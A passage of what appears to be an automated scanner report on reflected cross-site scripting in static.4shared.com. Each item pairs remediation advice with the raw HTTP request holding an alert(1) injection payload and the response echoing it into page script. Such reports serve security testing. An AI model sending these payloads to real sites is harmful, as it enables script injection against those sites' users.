Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0a9"-alert(1)-"beb8e3c777b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload16a0a9&quot;-alert(1)-&quot;beb8e3c777b/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85F1E680A4F8851A5E53D7C01D5CF5D8.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.395. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb5cd"-alert(1)-"8d2149dd564 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/download.csscb5cd&quot;-alert(1)-&quot;8d2149dd564
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F366F4B86F7A2AFCA5A418971330D4EE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:24 GMT
Content-Length: 36245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.396. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c69"-alert(1)-"2cf4627ec1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssf3c69&quot;-alert(1)-&quot;2cf4627ec1a/pageDownload1/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEFF1912BC6968ADA5A19D19FCFCF489.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:18 GMT
Content-Length: 36310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.397. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec9c"-alert(1)-"5240765fe67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1fec9c&quot;-alert(1)-&quot;5240765fe67/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F9F95CE1BFBC4C7B9EC88DA773F9FA0B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

3.398. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47081"-alert(1)-"19897fe20e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/downloadWithoutCommon.css47081&quot;-alert(1)-&quot;19897fe20e2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3449E686BCEAB24A694106C9996937F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:31 GMT
Content-Length: 36299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.399. http://static.4shared.com/css/tutorial.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/tutorial.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa773"-alert(1)-"b1f17542dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssaa773"-alert(1)-"b1f17542dec/tutorial.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssaa773&quot;-alert(1)-&quot;b1f17542dec/tutorial.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=72479505BB09D25E8361A917AB871891.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:05 GMT
Content-Length: 36164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssaa773"-alert(1)-"b1f17542dec/tutorial.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.400. http://static.4shared.com/css/tutorial.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/tutorial.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd74e"-alert(1)-"6dad30ac8f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/tutorial.cssfd74e&quot;-alert(1)-&quot;6dad30ac8f9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=93B8E7619EDD47EBB4FBE25560CB6C1A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:09 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.401. http://static.4shared.com/desktop/desktop.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /desktop/desktop.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f396c"-alert(1)-"7819c5badf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktopf396c"-alert(1)-"7819c5badf/desktop.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktopf396c&quot;-alert(1)-&quot;7819c5badf/desktop.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C1A7BD0B0E6AF8E747AC2544F9A16C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:40 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktopf396c"-alert(1)-"7819c5badf/desktop.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.402. http://static.4shared.com/desktop/desktop.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /desktop/desktop.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 630cd"-alert(1)-"d08d1566e98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktop/desktop.css630cd"-alert(1)-"d08d1566e98 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktop/desktop.css630cd&quot;-alert(1)-&quot;d08d1566e98
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA5872801E98E173BB61348634CE6CF6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:45 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktop/desktop.css630cd"-alert(1)-"d08d1566e98";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.403. http://static.4shared.com/dwr/engine.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/engine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7289a"-alert(1)-"da5431a7505 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr7289a"-alert(1)-"da5431a7505/engine.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwr7289a&quot;-alert(1)-&quot;da5431a7505/engine.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=00B3741014BF2AD0E8FF51C5BA549003.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:45 GMT
Content-Length: 36160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr7289a"-alert(1)-"da5431a7505/engine.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.404. http://static.4shared.com/dwr/engine.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/engine.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dbcd"-alert(1)-"68c48b7d60f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr/2dbcd"-alert(1)-"68c48b7d60f?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DAAB3CF86EC0E243EFBD3B3398498731.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:49 GMT
Content-Length: 36115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/2dbcd"-alert(1)-"68c48b7d60f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.405. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb97"-alert(1)-"81101aeb9ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwrecb97&quot;-alert(1)-&quot;81101aeb9ce/interface/DirChecks.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7D64AD06194FD8CC93BD6BE654E5F064.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:42 GMT
Content-Length: 36225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

3.406. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8499f"-alert(1)-"105b75277af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0465F93AE68A9307DB1F71E541F1FD88.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:46 GMT
Content-Length: 36214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.407. http://static.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf63"-alert(1)-"b00ceae7821 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4bf63"-alert(1)-"b00ceae7821 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __qca=P0-1133200866-1297862349616; search.view2=ls; JSESSIONID=1C17362F5BC92C5103B471FB8A66CDEC.dc293; __utmz=210074320.1298730611.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=210074320.1172937508.1297862350.1298497029.1298730611.3; __utmc=210074320; __utmb=210074320.1.10.1298730611; WWW_JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /favicon.ico4bf63&quot;-alert(1)-&quot;b00ceae7821
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A859F2580962A175B0E84ECA0DA5E46.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:30:33 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/favicon.ico4bf63"-alert(1)-"b00ceae7821";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.408. http://static.4shared.com/images/all1.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/all1.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14de5"-alert(1)-"e4251d0b96d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images14de5"-alert(1)-"e4251d0b96d/all1.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
